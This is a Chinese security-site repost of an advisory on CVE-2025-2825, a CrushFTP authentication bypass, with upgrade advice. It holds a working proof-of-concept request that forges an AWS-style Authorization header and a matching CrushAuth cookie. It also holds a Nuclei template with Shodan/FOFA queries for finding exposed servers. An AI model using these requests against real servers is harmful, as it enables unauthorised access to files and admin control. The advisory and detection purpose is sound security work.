CrushFTP 身份验证绕过 - CVE-2025-2825

admin
admin
admin
139897
文章
114
评论
2025年4月10日15:45:19评论13 views字数 2885阅读9分37秒阅读模式
企业文件传输解决方案是许多组织的关键基础设施,有助于系统和用户之间的安全数据交换。CrushFTP 是一款支持 FTP, FTPS, SFTP, HTTP, HTTPS, WebDAV and WebDAV SSL 等协议的跨平台 FTP 服务器软件。它同时提供一个 WEB 接口让用户可以使用浏览器来管理他们的文件。在 10.0.0 至 10.8.3 和 11.0.0 至 11.3.0 版本中发现了一个严重漏洞 (CVE-2025-2825),允许未经身份验证的攻击者绕过身份验证并获得未经授权的访问权限。
CrushFTP 身份验证绕过 - CVE-2025-2825

概念验证

利用此漏洞非常简单。攻击者只需要构造一个 HTTP 请求:

  1. 具有有效用户名的 AWS S3 样式授权标头

  2. 具有匹配 c2f 参数值的 CrushAuth cookie

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1Hosttarget-server:8081CookieCrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111AuthorizationAWS4-HMAC-SHA256 Credential=crushadmin/
CrushFTP 身份验证绕过 - CVE-2025-2825

攻击者可以访问文件、上传恶意内容、创建管理员用户,基本上可以完全访问服务器。

Nuclei 模板

id: CVE-2025-2825info:  name: CrushFTP Authentication Bypass  author: parthmalhotra,Ice3man,DhiyaneshDk,pdresearch  severity: critical  description: |    CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access.  reference:    - https://projectdiscovery.io/blog/crushftp-authentication-bypass/    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update    - https://www.rapid7.com/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H    cvss-score: 9.8    cve-id: CVE-2025-2825    cwe-id: CWE-287    epss-score: 0.00039    epss-percentile: 0.08378  metadata:    max-request: 2    vendor: crushftp    product: crushftp    shodan-query:      - http.title:"CrushFTP WebInterface"      - http.favicon.hash:-1022206565      - http.html:"crushftp"    fofa-query:      - icon_hash="-1022206565"      - title="CrushFTP WebInterface"      - body="crushftp"  tags: cve,cve2025,crushftp,unauth,auth-bypass,rcevariables:  string_1: "{{rand_text_numeric(13)}}"  string_2: "{{rand_text_alpha(28)}}"  string_3: "{{rand_text_numeric(4)}}"http:  - raw:      - |        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}        Host: {{Hostname}}        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/        Origin: {{RootURL}}        Referer: {{RootURL}}/WebInterface/login.html        X-Requested-With: XMLHttpRequest        Accept-Encoding: gzip      - |        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}        Host: {{Hostname}}        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/        Origin: {{RootURL}}        Referer: {{RootURL}}/WebInterface/login.html        X-Requested-With: XMLHttpRequest        Accept-Encoding: gzip    stop-at-first-match: true    matchers-condition: and    matchers:      - type: word        part: body        words:          - "<user_list_subitem>crushadmin</user_list_subitem>"      - type: word        part: content_type        words:          - "text/xml"      - type: status        status:          - 200

修复建议

请立即升级到版本 11.3.1+或实施网络级访问控制来限制服务器连接。

原文始发于微信公众号(Khan安全团队):CrushFTP 身份验证绕过 - CVE-2025-2825

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月10日15:45:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CrushFTP 身份验证绕过 - CVE-2025-2825https://cn-sec.com/archives/3938861.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息